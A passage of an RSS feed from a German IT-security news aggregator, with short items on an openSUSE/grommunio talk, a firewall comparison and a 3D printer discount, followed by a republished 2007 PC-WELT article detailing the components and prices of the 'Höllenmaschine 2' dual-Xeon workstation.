<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PARTNER CONTENT: nubia aims to democratize premium gaming with a revolutionary AquaCore thermal architecture, launching first in Southeast Asia]]></content:encoded>
</item>
<item>
<title><![CDATA[openSUSE & grommunio - The Exchange alternative (osc26)]]></title>
<description><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft E...]]></description>
<link>https://tsecurity.de/de/3654810/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654810/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</guid>
<pubDate>Wed, 08 Jul 2026 17:36:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft Exchange, with a strong focus on the technology behind making it usable out of the box. The session will show how grommunio builds on the openSUSE ecosystem to deliver a complete collaboration appliance based on openSUSE 16.0, using KIWI to create a reproducible, maintainable, and deployable system image.

Rather than only discussing groupware features, this talk goes behind the scenes: how the appliance is assembled, how openSUSE provides the operating system foundation, and how grommunio packages email, calendaring, contacts, mobile synchronization, Evolution/Thunderbird/Outlook compatibility, and administration into an integrated enterprise experience.

A key focus is the out-of-the-box experience: turning a powerful open source software stack into a product that can be installed, configured, and operated by real organizations. The talk highlights how openSUSE technologies enable a reliable appliance model, how grommunio delivers enterprise collaboration on top of it, and why this matters for organizations that want to reduce vendor lock-in without compromising usability or professional requirements.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Next-Generation Firewall (NGFW) Solutions Compared (2026): Features & Pricing ]]></title>
<description><![CDATA[Twelve firewalls, one question: which NGFW earns a place at your network edge in 2026? For most enterprises the shortlist starts with Fortinet FortiGate (best price-performance) and Palo Alto Networks (deepest application control), but the right answer shifts with your size, region, and cloud str...]]></description>
<link>https://tsecurity.de/de/3654758/it-security-nachrichten/best-next-generation-firewall-ngfw-solutions-compared-2026-features-pricing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654758/it-security-nachrichten/best-next-generation-firewall-ngfw-solutions-compared-2026-features-pricing/</guid>
<pubDate>Wed, 08 Jul 2026 17:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Twelve firewalls, one question: which NGFW earns a place at your network edge in 2026? For most enterprises the shortlist starts with Fortinet FortiGate (best price-performance) and Palo Alto Networks (deepest application control), but the right answer shifts with your size, region, and cloud strategy — and one of the twelve vendors here isn’t an appliance at all. A […]</p>
<p>The post <a href="https://gbhackers.com/ngfw-solutions-compared-features-pricing/">Best Next-Generation Firewall (NGFW) Solutions Compared (2026): Features &amp; Pricing </a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Bambu Lab A1 mini 'packs a punch in terms of performance and quality' — now our 5-star 3D printer for beginners gets a price cut]]></title>
<description><![CDATA[In our benchmark testing, the A1 mini proved a brilliant budget 3D printer for beginners and hobbyists.]]></description>
<link>https://tsecurity.de/de/3654201/it-nachrichten/the-bambu-lab-a1-mini-packs-a-punch-in-terms-of-performance-and-quality-now-our-5-star-3d-printer-for-beginners-gets-a-price-cut/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654201/it-nachrichten/the-bambu-lab-a1-mini-packs-a-punch-in-terms-of-performance-and-quality-now-our-5-star-3d-printer-for-beginners-gets-a-price-cut/</guid>
<pubDate>Wed, 08 Jul 2026 14:02:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In our benchmark testing, the A1 mini proved a brilliant budget 3D printer for beginners and hobbyists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vor 19 Jahren: PC-WELT verlost die Höllenmaschine 2 für 20.000 Euro]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen...]]></description>
<link>https://tsecurity.de/de/3653681/it-nachrichten/vor-19-jahren-pc-welt-verlost-die-hoellenmaschine-2-fuer-20000-euro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653681/it-nachrichten/vor-19-jahren-pc-welt-verlost-die-hoellenmaschine-2-fuer-20000-euro/</guid>
<pubDate>Wed, 08 Jul 2026 10:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der zweiten Höllenmaschine:</p>



<p>Wir lassen die Katze aus dem Sack: Unser Traumrechner ist vollgestopft mit allem, was aktuell, gut und teuer ist. Jetzt geht’s los: Activate!</p>



<p>Alles neu, alles besser: Die Höllenmaschine 2 der PC-WELT geht weit über das hinaus, was das <a href="https://www.pcwelt.de/article/3139027/vor-20-jahren-die-erste-hoellenmaschine-der-pc-welt-2006.html" target="_blank" rel="noreferrer noopener">Vorgänger-Modell</a> bot: Zu den Highlights gehören die zwei Direct-X-10-Grafikkarten, die beiden Quad-Core-Prozessoren, der Blue-Ray-Brenner und die rasanten SAS-Festplatten.</p>



<p>Auch mit einem Standardgehäuse geben wir uns nicht mehr zufrieden: Diesmal musste es ein Maßanzug sein, den wir beim Fachmann bestellten. Der war alles andere als günstig – allein die Materialkosten summieren sich auf knapp 3600 Euro. </p>



<p>Wir werden Sie umfassend über die Höllenmaschine 2 informieren. Dazu haben wir die Übersichtsseite www.pcwelt.de/hoelle eingerichtet. Dort finden Sie tagesaktuell Tests, Hintergrundberichte, Video-Clips und Downloads rund um den 20.000-Euro-Superrechner – etwa unsere Titelmelodie “Activate” als <a href="https://web.archive.org/web/20070315054309/http:/www.pcwelt.de/downloads/entertainment_spiele/unterhaltung/73303/index.html">MP3-Download</a>. Doch jetzt geht’s endlich los: Wir stellen Ihnen den Rechnertraum in allen Details vor.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Prozessor: Dual-Quad-Core</h2>



<p>Zwei Workstation-Prozessoren des Typs <a href="https://web.archive.org/web/20070315054035/ftp:/download.intel.com/products/processor/xeon/dc53kprodbrief.pdf">Intel Xeon DP 5355</a> zum Stückpreis von 1200 Euro gehen auch bei rechenintensiven Profi-Programmen nicht in die Knie. Die Vier-Kern-CPUs arbeiten mit einem Prozessortakt von 2,67 GHz und greifen auf jeweils 8 MB L2-Cache zurück. Der Systemtakt des Intel Xeon 5355 beträgt 333 (effektiv 1333) MHz. Damit erreicht die Datenkapazität, die jeder der beiden Prozessoren pro Sekunde mit dem System austauschen kann, bis zu 10,5 GB. Der Xeon DP 5355 unterstützt <a href="https://web.archive.org/web/20070315054035/http:/www.tecchannel.de/server/hardware/402269/">FB-DIMM-Speicher</a> der DDR2-Spezifikationen PC533 und PC667.</p>



<p>Das Prozessor-Duo basiert auf Intels rechenstarker <a href="https://web.archive.org/web/20070315054035/http:/www.tecchannel.de/technologie/prozessoren/441760/">Core-Architektur</a>, die sich dank 65-Nanometer-Fertigung und ausgeklügelter Stromspartechniken durch einen genügsamen Energieverbrauch auszeichnet: Unter anderem kann der Vierkern-Prozessor inaktive Teile in jedem Rechenkern abschalten (Intelligent Power Capability), jeden Kern unabhängig voneinander in den stromsparenden Bereitschaftszustand versetzen (Enhanced Halt State) und jedem Rechenkern die Taktfrequenz und Kernspannung zuweisen, die für die aktuell benötigte Rechenleistung notwendig ist (Enhanced Intel Speedstep). Dank dieser Stromspartricks liegt die Thermal Design Power (TDP) des Quad-Cores bei lediglich 120 Watt – sensationell niedrig im Vergleich zu einer Einkern-CPU wie beispielsweise dem Pentium 4 670 (<a href="https://web.archive.org/web/20070315054035/http:/www.pcwelt.de/tests/hardware-tests/prozessoren/114491/">Test</a>), der mit 115 Watt fast genauso viel Energie verbrät.</p>



<p>Mehr Möglichkeiten: Der Xeon DP 5355 unterstützt die Virtualisierungs-Technik <a href="https://web.archive.org/web/20070315054035/http:/www.intel.com/technology/virtualization/index.htm">Vanderpool</a> sowie 32- und 64-Bit-Betriebssysteme – interessant für Nutzer, die unter anderem virtuelle Server mit unterschiedlichen Betriebssystemen einrichten möchten. Mit einem Achtkern-System lässt sich da so einiges realisieren. Welche Erfahrungen wir beim Experimentieren mit Virtualisierungs-Software wie Xen und VM-Ware gemacht haben, erfahren Sie in Kürze in einem weiteren Artikel, der die Leistungsfähigkeit der Höllenmaschine 2 beleuchtet.</p>



<p>Ein System mit so vielen Hardware-Komponenten wie unsere Höllenmaschine II verlangt nach einem besonders anschlussfreudigen Untersatz: Wir haben uns für die Tyan Tempest i5000XL (S2692) mit dem Intel-Chipsatz 5000X/6321ESB entschieden. Die Workstation-Hauptplatine besitzt zwei Prozessor-Steckplätze für Sockel-771-CPUs und hat mit ihrem CEB-Formfaktor eine Übergröße von 305 x 259 Millimetern.</p>



<p>Die Tempest i5000XL wartet mit zahlreichen Schnittstellen auf: Dazu gehören unter anderem ein 8x- und zwei 16x-PCI-Express- sowie zwei PCI-X-Steckplätze. Über interne Controller stehen ein PATA- und ein Floppy-Port sowie sechs SATA2- und acht USB-2.0-High-Speed-Schnittstellen zur Verfügung. Ebenfalls integriert: eine Gigabit-Ethernet-Buchse und der HD-Audio-Controller Realtek ALC888. Vier Speicherbänke nehmen insgesamt bis zu 16 GB fully buffered DDR2-667-SDRAM auf.</p>



<p>Volle Kontrolle: Das Phoenix-BIOS der Workstation-Hauptplatine beherrscht netzwerkgestützte Funktionen wie „Serial Console Redirect“ und „Preboot Execution Environment“ (PXE). Hinzu kommt eine frei konfigurierbare Monitoring-Funktion. Wer will, kann außerdem das <a href="https://web.archive.org/web/20070315054444/http:/de.wikipedia.org/wiki/Trusted_Platform_Module">Trusted Platform Module</a> (TPM) Infineon SLB9635TT aktivieren, das im Intel-Chipsatz integriert ist.</p>



<h2 class="wp-block-heading toc">Grafik: Dual Direct X 10</h2>



<p>Eine Direct-X-10-Grafiklösung ist Pflicht für unseren 20.000-Euro-Rechner. Wir haben uns für zwei Grafikkarten des Typs <a href="https://web.archive.org/web/20070315054738/http:/www.pny.eu/products.php?section=product&amp;categoryid=7&amp;subcategoryid=64&amp;productid=95">PNY Verto Geforce 8800 GTX</a> entschieden. Der Grafikchip Geforce 8800 GTX besteht aus 681 Millionen Transistoren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b0999014"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/PNY-Verto-Geforce-8800-GTX.jpg?quality=50&amp;strip=all" alt="PNY Verto Geforce 8800 GTX" class="wp-image-3182066" width="819" height="614" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PNY</p></div>



<p>Damit übertrifft die Komplexität von Nvidias <a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/tests/hardware-tests/pci-express-grafikkarten/63061/">Geforce-8-Generation</a> alle GPUs (Graphic Processing Unit), die bisher auf den Markt gekommen sind. Zum Vergleich: AMDs Spitzenmodell Radeon X1950 XTX stehen mit 384 Millionen nur rund die Hälfte an Transistoren zur Verfügung. Und der hauseigene Vorgänger Geforce 7900 GTX kommt lediglich auf 278 Millionen Schaltkreise.</p>



<p>Die unglaubliche Komplexität liegt in der Architektur begründet, die Nvidia komplett neu entwickelt hat. Beim Geforce 8 handelt es sich um Nvidias ersten Grafikchip mit der sogenannten „Unified Shader Architecture“. Es gibt also keine spezialisierten Pixel- und Vertex-Shader mehr, sondern universell einsetzbare Shader, die dynamisch die Rechenarbeit übernehmen. Insgesamt werkeln im Geforce 8800 GTX satte 128 dieser Rechenwerke, die Nvidia Streaming-Prozessoren (SP) getauft hat. Die SPs fungieren nicht nur als Pixel- oder Vertex-Shader, sondern können auch die Geometrie- und Physik-Berechnung übernehmen.</p>



<p>Der eigentliche Takt des Grafikchips beträgt beim Geforce 8800 GTX nur 575 MHz. Die Taktfrequenz der Streaming-Prozessoren des Nvidia-Flaggschiffs liegt hingegen bei außerordentlichen 1350 MHz. Sogenannte Threading-Einheiten teilen die anfallenden Rechenaufgaben dynamisch in kleine Stücke auf und schicken sie an die Streaming-Prozessoren. Nvidia nennt diese Technik „Gigathread Technology“.</p>



<p>Jede PNY-Grafikkarte (<a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/tests/hardware-tests/pci-express-grafikkarten/63070/">PC-WELT-Test</a>) greift auf 768 MB GDDR3-SDRAM (effektiver Takt: 1800 MHz) zu, das an einen 384 Bit breiten Speicherbus angebunden ist. Damit erhöht sich die theoretisch maximale Speicherbandbreite auf heftige 86,4 GB/s. Hoch aufgelöste Filme auf Blu-Ray- und HD-DVD-Medien kann die Karte dank integriertem HDCP-Chip ebenfalls ausgeben.</p>



<p>Wermutstropfen: Derzeit lässt sich unter Windows Vista und XP nur eine Karte ansprechen, da Nvidia die SLI-Funktion für den 5000X-Chipsatz von Intel nicht freigeschaltet hat. Nvidias Treiber-Entwicklerteam kümmert sich erst einmal um die hauseigenen Hauptplatinen-Chipsätze und programmiert fieberhaft an einem SLI-fähigen Direct-X-10-Treiber für Windows Vista. Da Nvidia und Intel aber seit der <a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/news/business/52087/index.html">ATI-Übernahme von AMD</a> enger zusammenarbeiten, sind wir zuversichtlich, dass Nvidia – sobald die Hausaufgaben erledigt sind – auch eine SLI-Lösung für Intel-Chipsätze anbietet. Und wenn’s bei Nvidia etwas länger dauern sollte – freigeschaltete SLI-Treiber für die Geforce-7-Baureihe waren ja auch recht flott auf den einschlägigen Websites erhältlich …</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 2 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Komponente</strong></td><td><strong>Modell</strong></td><td><strong>Preis</strong> <strong>(Euro)</strong> am 3.3.2007</td></tr><tr><td>Hauptplatine</td><td>Tyan Tempest i5000XL (S2692)</td><td>400</td></tr><tr><td>Prozessor</td><td>2 x Intel Xeon 5355 Quad-Core</td><td>2400</td></tr><tr><td>Speicher</td><td>4 x 1 GB Corsair registered PC667 FB-DIMM</td><td>850</td></tr><tr><td>Grafik</td><td>2 x PNY Verto Geforce 8800 GTX mit je 768 MB GDDR3-Speicher</td><td>1100</td></tr><tr><td>Raid-Controller</td><td>Adaptec 4800SAS/128, PCI-X</td><td>850</td></tr><tr><td>Festplatten</td><td>4 x 147 GB Seagate Cheetah 15K.4 ST3146854SS, SAS, Raid 10</td><td>2600</td></tr><tr><td></td><td>4 x 750 GB Seagate Barracuda ST3750640AS, SATA II, Raid 10</td><td>1400</td></tr><tr><td></td><td>Seagate Pushbutton External Hard Drive 750 GB, Firewire/USB 2.0</td><td>400</td></tr><tr><td>Brenner</td><td>Blu-ray-Laufwerk Philips SPD7000BD, SATA</td><td>850</td></tr><tr><td></td><td>DVD-Laufwerk Samsung SH-S182A, PATA</td><td>50</td></tr><tr><td>Gehäuse</td><td>PC-WELT Höllenmaschine 2 von Heiko Polaczek (nur Materialwert)</td><td>3600</td></tr><tr><td>Wasserkühlung</td><td>Innovatek Triple Radiator, Tank-O-Matik, Eheim-Pumpe HPPS Plus, Flowmeter Pro 3.6 sowie CPU-, Grafikchip- und Festplattenkühler</td><td>1950</td></tr><tr><td>Netzteil</td><td>Enermax Galaxy EGA1000EWL, 1000 Watt</td><td>350</td></tr><tr><td>Soundkarte</td><td>Creative X-Fi Fatal1ty Edition</td><td>200</td></tr><tr><td>Boxensystem</td><td>Creative Gigaworks Progamer G550W</td><td>450</td></tr><tr><td>Bildschirme</td><td>BenQ FP241W 24-Zoll-TFT</td><td>1100</td></tr><tr><td></td><td>integrierter 8-Zoll-LCD-Touchscreen VE-XVT-8</td><td>250</td></tr><tr><td>Betriebssysteme</td><td>Microsoft Windows Vista Ultimate</td><td>550</td></tr><tr><td></td><td>Open Suse Linux 10.2</td><td>50</td></tr><tr><td>Eingabegeräte</td><td>Logitech di Novo Edge Tastatur &amp; MX Revolution Maus</td><td>300</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b0999dca"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/HM2-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="PC-WELT Höllenmaschine 2 aus dem Jahre 2007" class="wp-image-3162271" width="1200" height="553" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die Höllenmaschine 2 aus dem Jahr 2007</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">RAM und HDDs: FB-DIMM und Quad-SAS</h2>



<p>Wir bestücken alle vier Speicherbänke der Workstation-Hauptplatine mit Fully Buffered DDR2-667-SDRAM – und zwar mit den 1-GB-Modulen <a href="https://web.archive.org/web/20070315055004/http:/www.corsair.com/corsair/products/specs/CM73DD1024R.pdf">Corsair CM73DD1024R-667</a>. Fully-Buffered-Speicher nutzt zusätzliche Datenleitungen für die Datenintegritätsprüfung. Für eine schnellere Datenverarbeitung laufen die vier Speichermodule paarweise im Zwei-Kanal-Modus.</p>



<p>Das schwächste Glied in aktuellen PCs ist meist die Festplatte. Nicht so bei der Höllenmaschine 2: Sie vertraut auf superschnelle Server-Laufwerke, die die Punkt-zu-Punkt-Verbindung Serial Attached SCSI (SAS) nutzen. SAS ist der Nachfolger der parallelen SCSI-Schnittstelle und bietet eine theoretische Datentransferrate von bis zu 300 MB/s, die sich im Gegensatz zu SATA II in der Praxis mit Raid-Konfigurationen auch tatsächlich annähernd erreichen lässt.</p>



<p>Für die Höllenmaschine fiel unsere Wahl auf das Modell <a href="https://web.archive.org/web/20070315054634/http:/www.seagate.com/docs/pdf/datasheet/disc/ds_cheetah15k.4.pdf">Seagate Cheetah 15K.4 ST3146854SS</a> mit 147 GB formatierter Kapazität. Preis pro Stück: knapp 650 Euro. Das 3,5-Zoll-Laufwerk rotiert mit 15 000 Umdrehungen pro Minute, der Datenpuffer beträgt 8 MB. Die durchschnittliche Zugriffszeit der Cheetah 15K.4 liegt laut Hersteller bei 2 Millisekunden. Damit wäre das Seagate-Laufwerk mehr als doppelt so fix wie die bisher schnellste von uns getestete SATA-Festplatte.</p>



<p>Die Seagate Cheetah 15K.4 ST3146854SS besitzt vier Datenscheiben mit jeweils zwei Schreib-Lese-Köpfen. Die <a href="https://web.archive.org/web/20070315054634/http:/www.pcwelt.de/know-how/tipps_tricks/hardware/festplatten/66306/index.html">Zuverlässigkeit</a> respektive MTBF (Mean Time Between Failures) der SAS-Laufwerke gibt Seagate mit 1,4 Millionen Betriebsstunden an. Die Annualized Failure Rate (AFR), also die Wahrscheinlichkeit, dass ein Laufwerk innerhalb eines Jahres ausfällt, liegt laut Hersteller bei 0,62 Prozent.</p>



<p>Noch mehr Tempo kitzeln wir aus der Cheetah 15K.4, indem wir gleich vier der SAS-Laufwerke mittels der PCI-X-Controller-Karte <a href="https://web.archive.org/web/20070315054634/http:/www.adaptec.com/de-DE/products/sas/raid/SAS-4800/index.htm">Adaptec 4800SAS/128</a> zu einem Raid-10-Verbund koppeln. Zwei Laufwerke fungieren dabei als RAID-0-Verbund: Dadurch lässt sich im Idealfall die Datentransferrate fast verdoppeln, da der SAS-Controller den Datenstrom in kleine Pakete zerlegt (Striping), die er simultan auf das Plattenduo schreibt beziehungsweise davon liest. Um eine hundertprozentige Datensicherheit zu gewährleisten, arbeiten die beiden anderen SAS-Laufwerke im RAID-1-Modus und spiegeln so den Datenbestand des RAID-0-Verbundes.</p>



<p>Umsonst gibt’s die Datensicherheit allerdings nicht: Durch den RAID-10-Verbund halbiert sich die nutzbare Kapazität des Laufwerk-Quartetts auf knapp 300 GB. Damit Systemprogramme und Applikationen möglichst verzögerungsfrei starten und arbeiten, haben wir die Betriebssysteme sowie alle Programme und Benchmarks auf der SAS-Partition installiert.</p>



<p>Ausreichend Platz für umfangreiche Musik- und Video-Sammlungen gibt’s auf der zweiten Partition der Höllenmaschine 2: Sie besteht aus vier 750-GB-Laufwerken des Typs <a href="https://web.archive.org/web/20070315054351/http:/www.seagate.com/ww/v/index.jsp?locale=de-DE&amp;name=Barracuda_7200.10_SATA_750.3_GB&amp;vgnextoid=ea7bc4d44018e010VgnVCM100000dd04090aRCRD&amp;vgnextchannel=a32a2f290c5fb010VgnVCM100000dd04090aRCRD&amp;reqPage=Model">Seagate Barracuda 7200.10 ST3750640AS</a>, die wir ebenfalls zu einem Raid-10-Verbund gebündelt haben. Die Festplatten bieten dann zusammen eine formatierte Kapazität von knapp 1,4 Terabyte.</p>



<p>Die Barracuda 7200.10 setzt auf die SATA-II-Schnittstelle, die eine theoretische Transferrate von bis zu 300 MB/s erreicht. In der Praxis erzielen Sie diesen Wert zwar nicht, bei einem Raid-0-Verbund aus zwei Platten dürfen Sie aber durchschnittlich mit deutlich über 100 MB/s rechnen. Damit verwalten und archivieren Sie selbst große Videodateien sehr flott.</p>



<p>Die Seagate Barracuda 7200.10 ST3750640AS ist technisch auf der Höhe der Zeit: Das 3,5-Zoll-Laufwerk beherrscht die Technik Native Command Queuing (NCQ). NCQ erlaubt der Festplatte, die vom System geforderten Zugriffe selbstständig zu verwalten. Sie kann so die optimale Reihenfolge der Zugriffe ermitteln: Das spart zusätzliche Drehbewegungen, verkürzt damit die Wegstrecken, die der Schreib-/Lesekopf zurücklegen muss, und sorgt ergo für ein höheres Tempo. Eine höhere Datenübertragungsrate lässt sich auch mit <a href="https://web.archive.org/web/20070315054351/http:/www.pcwelt.de/tests/hardware-tests/festplatten/130042/index.html">Perpendicular Recording</a> erzielen, da die Datenbits nicht mehr horizontal, sondern vertikal auf dem Datenträger angeordnet sind. Auch diese moderne Technik setzt die Barracuda 7200.10 ein, was wir im <a href="https://web.archive.org/web/20070315054351/http:/www.pcwelt.de/tests/hardware-tests/festplatten/137452/">PC-WELT-Test</a> mit einer Innovations-Empfehlung belohnt haben.</p>



<h2 class="wp-block-heading toc">Mehr Mobilität: 750 GB externer Speicher und Allesleser</h2>



<p>Mit der <a href="https://web.archive.org/web/20070315054402/http:/www.seagate.com/www/de-de/products/external/pushbutton_backup/">Seagate Pushbutton External Hard Drive</a> stehen Ihnen zusätzlich 750 GB mobiler Speicher zur Verfügung. Das externe 3,5-Zoll-Laufwerk erstellt ein Backup bequem auf Knopfdruck – selbst umfangreiche Datenbestände lassen sich auf diese Weise sichern. Bei der Datensicherung unterstützt Sie die beiliegende Software Bounceback Express. Die native SATA-II-Festplatte mit der Modellbezeichnung <a href="https://web.archive.org/web/20070315054402/http:/www.seagate.com/ww/v/index.jsp?locale=de-DE&amp;name=null&amp;vgnextoid=900a04b0c488e010VgnVCM100000dd04090aRCRD&amp;vgnextchannel=c0fed21c2f32b010VgnVCM100000dd04090aRCRD&amp;reqPage=Model">ST3750640CB-RK</a> besitzt sowohl eine Firewire- als auch eine USB-2.0-High-Speed-Schnittstelle.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b099a85a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Seagate-Pushbutton-External-Hard-Drive.jpg?quality=50&amp;strip=all" alt="Seagate Pushbutton External Hard Drive " class="wp-image-3182080" width="578" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Seagate </p></div>



<p>Die Seagate Pushbutton rotiert mit 7.200 Umdrehungen pro Minute, der Datenpuffer beträgt stattliche 16 MB. Auch dieses Seagate-Laufwerk realisiert die hohe Kapazität mithilfe der Technik Perpendicular Recording. Auf den vier Datenscheiben wuseln insgesamt acht Schreib-Lese-Köpfe mit einem kaum wahrnehmbaren Betriebsgeräusch.</p>



<p>Sie können aber auch jede beliebige Speicherkarte mit den Daten der Höllenmaschine II füttern, denn der integrierte Kartenleser kommt mit allen gängigen Formaten wie Compact Flash (Typ I und II), MagicGate Memory Stick (Duo, Pro, Pro Duo), Memory Stick (Duo, Pro, Pro Duo, Pro Ultra II, ROM, Select), Microdrive, Micro SD, Multimedia Karte (RS), Secure Digital (Mini) Karte und Smart Media Karte klar. Das integrierte Disketten-Laufwerk speichert zwar auch Daten, dient aber eher für knifflige BIOS-Updates und Betriebssysteminstallationen – sofern kein bootfähiger USB-Stick zur Hand ist oder die benötigten Daten nur auf Floppy vorliegen.</p>



